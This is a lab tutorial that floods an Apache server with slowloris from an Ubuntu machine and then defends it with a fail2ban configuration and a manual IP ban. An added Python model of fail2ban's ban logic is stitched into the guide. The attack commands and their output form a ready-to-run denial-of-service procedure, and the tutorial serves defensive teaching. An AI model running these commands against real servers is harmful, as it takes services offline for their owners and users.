DOS Prevention — Step by step guide

DOS Attack From Ubuntu OS

  • Here we will run a DoS attack using slowloris. Slowloris is a very common tool used in DoS attacks.
  • Open terminal on Ubuntu machine (Attacker)
  • Type sudo apt-get update
  • Type sudo apt-get install python3
  • Type sudo apt-get install python3-pip
  • Type pip3 --version
root@ubuntu:/home/iicybersecurity# pip3 --version
pip 9.0.1 from /usr/lib/python3/dist-packages (python 3.6)
root@ubuntu:/home/iicybersecurity# pip3 install slowloris
Collecting slowloris
  Downloading https://files.pythonhosted.org/packages/a6/37/5ae3d027727122039f52a22d278f1d73f564e03e5fdb93f10e3a2f26aa06/Slowloris-0.2.0.tar.gz
Building wheels for collected packages: slowloris
  Running setup.py bdist_wheel for slowloris ... done
  Stored in directory: /root/.cache/pip/wheels/bd/a1/f1/35dd5184db4e890b6ff5c992ff1f7a1b8b30e9bcd89aa6f7ba
Successfully built slowloris
Installing collected packages: slowloris
Successfully installed slowloris-0.2.0
root@ubuntu:/home/iicybersecurity# slowloris --help
usage: slowloris [-h] [-p PORT] [-s SOCKETS] [-v] [-ua] [-x]
                 [--proxy-host PROXY_HOST] [--proxy-port PROXY_PORT] [--https]
                 [--sleeptime SLEEPTIME]
                 [host]

Slowloris, low bandwidth stress test tool for websites

positional arguments:
  host                  Host to perform stress test on

optional arguments:
  -h, --help            show this help message and exit
  -p PORT, --port PORT  Port of webserver, usually 80
  -s SOCKETS, --sockets SOCKETS
                        Number of sockets to use in the test
  -v, --verbose         Increases logging
  -ua, --randuseragents
                        Randomizes user-agents with each request
  -x, --useproxy        Use a SOCKS5 proxy for connecting
  --proxy-host PROXY_HOST
                        SOCKS5 proxy host
  --proxy-port PROXY_PORT
                        SOCKS5 proxy port
  --https               Use HTTPS for the requests
  --sleeptime SLEEPTIME
                        Time to sleep between each header sent.
  • The Wireshark screenshot above shows the victim receiving the TCP packets. The victim is running the apache2 service, and by default slowloris sends its packets to port 80.
  • This is a very simple scenario of how a DoS attack is simulated. To defend against such DoS attacks, we will use fail2ban.

Victim/ Defender Machine — Kali OS

Fail2Ban Installation

  • We will be testing on Linux distros. For attacking we will use Ubuntu 18.04, and on the victim/defender side we will use Kali Linux.
  • Kali Linux (Victim & Defender) — 192.168.1.9
  • Ubuntu (Attacker) — 192.168.1.8
  • For installation on Kali Linux, open a terminal.
  • Type sudo apt-get update
  • Type sudo apt-get install fail2ban
  • Type sudo service apache2 start
  • Type sudo systemctl status apache2
root@kali:/etc/fail2ban# sudo systemctl status apache2
● apache2.service - The Apache HTTP Server
   Loaded: loaded (/lib/systemd/system/apache2.service; disabled; vendor preset: disabled)
   Active: active (running) since Tue 2019-11-05 02:09:37 EST; 2h 47min ago
  Process: 4749 ExecStart=/usr/sbin/apachectl start (code=exited, status=0/SUCCESS)
 Main PID: 4753 (/usr/sbin/apach)
    Tasks: 152 (limit: 4662)
   Memory: 91.3M
   CGroup: /system.slice/apache2.service
           ├─4753 /usr/sbin/apache2 -k start
           ├─4754 /usr/sbin/apache2 -k start
           ├─6073 /usr/sbin/apache2 -k start
           ├─6074 /usr/sbin/apache2 -k start
           ├─6075 /usr/sbin/apache2 -k start
           ├─6077 /usr/sbin/apache2 -k start
           ├─6079 /usr/sbin/apache2 -k start
           ├─6080 /usr/sbin/apache2 -k start
           ├─6081 /usr/sbin/apache2 -k start
           ├─6083 /usr/sbin/apache2 -k start
           ├─6084 /usr/sbin/apache2 -k start
           ├─6085 /usr/sbin/apache2 -k start
           ├─6086 /usr/sbin/apache2 -k start
           ├─6087 /usr/sbin/apache2 -k start
           ├─6088 /usr/sbin/apache2 -k start
           ├─6089 /usr/sbin/apache2 -k start
           ├─6090 /usr/sbin/apache2 -k start
           ├─6091 /usr/sbin/apache2 -k start
           ├─6092 /usr/sbin/apache2 -k start
           ├─6093 /usr/sbin/apache2 -k start
           ├─6094 /usr/sbin/apache2 -k start
  • Press Ctrl+C to leave the status output.
  • Before starting the fail2ban service, we have to configure it. For that, enter enabled = true under [apache-auth], [apache-badbots], [apache-noscript] & [apache-overflows] as shown below.
# ignorecommand = /path/to/command
ignorecommand =

# "bantime" is the number of seconds that a host is banned.
bantime = 30

# A host is banned if it has generated "maxretry" during the last "findtime" seconds.
findtime = 50

# "maxretry" is the number of failures before a host get banned.
maxretry = 10

#
# HTTP servers
#

[apache-auth]
enabled = true
port = http,https
logpath = %(apache_error_log)s

[apache-badbots]
# Ban hosts which agent identifies spammer robots crawling the web for email addresses.
# The mail outputs are buffered.
enabled = true
port = http,https
logpath = %(apache_access_log)s
bantime = 48h
maxretry = 1

[apache-noscript]
enabled = true
port = http,https
logpath = %(apache_error_log)s

[apache-overflows]
enabled = true
port = http,https
logpath = %(apache_error_log)s
maxretry = 2

[apache]
enabled = true
port = http,https
filter = apache-auth
logpath = /var/log/apache2/*error.log
maxretry = 2
findtime = 50
ignoreip =

root@kali:/etc/fail2ban# sudo /etc/init.d/fail2ban start
[ ok ] Starting fail2ban (via systemctl): fail2ban.service.
root@kali:/etc/fail2ban# sudo systemctl status fail2ban.service
● fail2ban.service - Fail2Ban Service
   Loaded: loaded (/lib/systemd/system/fail2ban.service; disabled; vendor preset: disabled)
   Active: active (running) since Tue 2019-11-05 05:02:20 EST; 3s ago
     Docs: man:fail2ban(1)
  Process: 6475 ExecStartPre=/bin/mkdir -p /var/run/fail2ban (code=exited, status=0/SUCCESS)
 Main PID: 6476 (fail2ban-server)
    Tasks: 13 (limit: 4662)
   Memory: 17.9M
   CGroup: /system.slice/fail2ban.service
           └─6476 /usr/bin/python3 /usr/bin/fail2ban-server -xf start

Nov 05 05:02:20 kali systemd[1]: Starting Fail2Ban Service...
Nov 05 05:02:20 kali systemd[1]: Started Fail2Ban Service.
Nov 05 05:02:21 kali fail2ban-server[6476]: Server ready
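To make the bantime, findtime and maxretry semantics from the jail configuration above concrete, here is an added Python model of the ban decision; it is not fail2ban's own code and not part of the original guide. It applies the [apache] jail values (maxretry = 2, findtime = 50, bantime = 30) to constructed Apache error-log lines; the filter used here (any error line carrying a client IP) and the log message text are assumptions, since fail2ban's real apache-* filters match only specific error strings.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Apache 2.4 error-log lines open with a bracketed timestamp and name the peer as
# "[client IP:port]". Counting every such line as a failure is a simplification.
TS_RE = re.compile(r"^\[(?P<ts>[^\]]+)\]")
CLIENT_RE = re.compile(r"\[client (?P<ip>[0-9a-fA-F.:]+):\d+\]")
TS_FMT = "%a %b %d %H:%M:%S.%f %Y"

class Jail:
    # Sliding-window ban logic using the [apache] jail values from this guide.
    def __init__(self, maxretry=2, findtime=50, bantime=30):
        self.maxretry, self.findtime, self.bantime = maxretry, findtime, bantime
        self.failures = defaultdict(deque)  # ip -> failure times inside findtime
        self.bans = {}                       # ip -> time the ban expires
        self.total_banned = 0

    def observe(self, line):
        ts_m, ip_m = TS_RE.match(line), CLIENT_RE.search(line)
        if not (ts_m and ip_m):
            return None
        ts, ip = datetime.strptime(ts_m.group("ts"), TS_FMT), ip_m.group("ip")
        # Lift any ban whose bantime has elapsed before this event.
        for old in [b for b, until in self.bans.items() if ts >= until]:
            del self.bans[old]
        window = self.failures[ip]
        window.append(ts)
        while (ts - window[0]).total_seconds() > self.findtime:
            window.popleft()          # failures older than findtime no longer count
        if len(window) >= self.maxretry and ip not in self.bans:
            self.bans[ip] = ts + timedelta(seconds=self.bantime)
            self.total_banned += 1
            window.clear()
            return ip                 # this line triggered a ban
        return None

# Constructed sample lines: attacker failures 60 s apart (outside findtime), a third
# 20 s later (ban), one failure from another host, then one after bantime elapsed.
SAMPLE_LOG = [
    "[Tue Nov 05 02:09:00.000000 2019] [core:error] [pid 6073] [client 192.168.1.8:40001] constructed error",
    "[Tue Nov 05 02:10:00.000000 2019] [core:error] [pid 6074] [client 192.168.1.8:40002] constructed error",
    "[Tue Nov 05 02:10:20.000000 2019] [core:error] [pid 6075] [client 192.168.1.8:40003] constructed error",
    "[Tue Nov 05 02:10:22.000000 2019] [core:error] [pid 6077] [client 192.168.1.20:40500] constructed error",
    "[Tue Nov 05 02:10:55.000000 2019] [core:error] [pid 6079] [client 192.168.1.8:40004] constructed error",
]

def run(lines=SAMPLE_LOG, **params):
    jail = Jail(**params)
    triggered = [ip for ip in map(jail.observe, lines) if ip]
    return triggered, sorted(jail.bans), jail.total_banned
```

Running run() bans 192.168.1.8 only on the third line, because the first two failures are more than findtime apart, and the ban has already expired by the time the last line arrives.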

Attacker Machine — Ubuntu OS

  • Type slowloris 192.168.1.9 -p 80 and slowloris will start sending packets to the target IP address.
  • 192.168.1.9 is the target IP address.
  • -p specifies the port number; using port 80 it will generate the traffic.
root@ubuntu:/home/iicybersecurity# slowloris 192.168.1.9 -p 80
[05-11-2019 02:08:59] Attacking 192.168.1.9 with 150 sockets.
[05-11-2019 02:08:59] Creating sockets...
[05-11-2019 02:08:59] Sending keep-alive headers... Socket count: 150
[05-11-2019 02:09:14] Sending keep-alive headers... Socket count: 150
[05-11-2019 02:09:29] Sending keep-alive headers... Socket count: 150
[05-11-2019 02:09:44] Sending keep-alive headers... Socket count: 150
[05-11-2019 02:09:59] Sending keep-alive headers... Socket count: 150
[05-11-2019 02:10:14] Sending keep-alive headers... Socket count: 150
[05-11-2019 02:10:29] Sending keep-alive headers... Socket count: 150
[05-11-2019 02:10:44] Sending keep-alive headers... Socket count: 150
[05-11-2019 02:11:00] Sending keep-alive headers... Socket count: 150
[05-11-2019 02:11:15] Sending keep-alive headers... Socket count: 150
[05-11-2019 02:11:30] Sending keep-alive headers... Socket count: 150
[05-11-2019 02:11:45] Sending keep-alive headers... Socket count: 150
[05-11-2019 02:12:00] Sending keep-alive headers... Socket count: 150
[05-11-2019 02:12:15] Sending keep-alive headers... Socket count: 150
[05-11-2019 02:12:30] Sending keep-alive headers... Socket count: 150

Victim/ Defender Machine

  • Now go to the victim machine, Kali Linux. In Wireshark, you will notice the DoS traffic from the attacker machine to the target IP address.
  • Type sudo fail2ban-client set apache banip 192.168.1.8
  • This command bans the attacker's IP address (192.168.1.8) in the apache jail. The screenshot below shows that 192.168.1.8 has been blocked.
  • The screenshot above shows that no more packets are being received from the attacker machine.
  • Now if you check the fail2ban status, you will notice that the attacker IP has been blocked because the attacker was sending multiple packets.
  • To check the status, open another terminal and type sudo fail2ban-client status apache
root@kali:/var/log/apache2# sudo fail2ban-client status apache
Status for the jail: apache
|- Filter
|  |- Currently failed: 0
|  |- Total failed:     1
|  `- File list:        /var/log/apache2/error.log
`- Actions
   |- Currently banned: 1
   |- Total banned:     1
   `- Banned IP list:   192.168.1.8
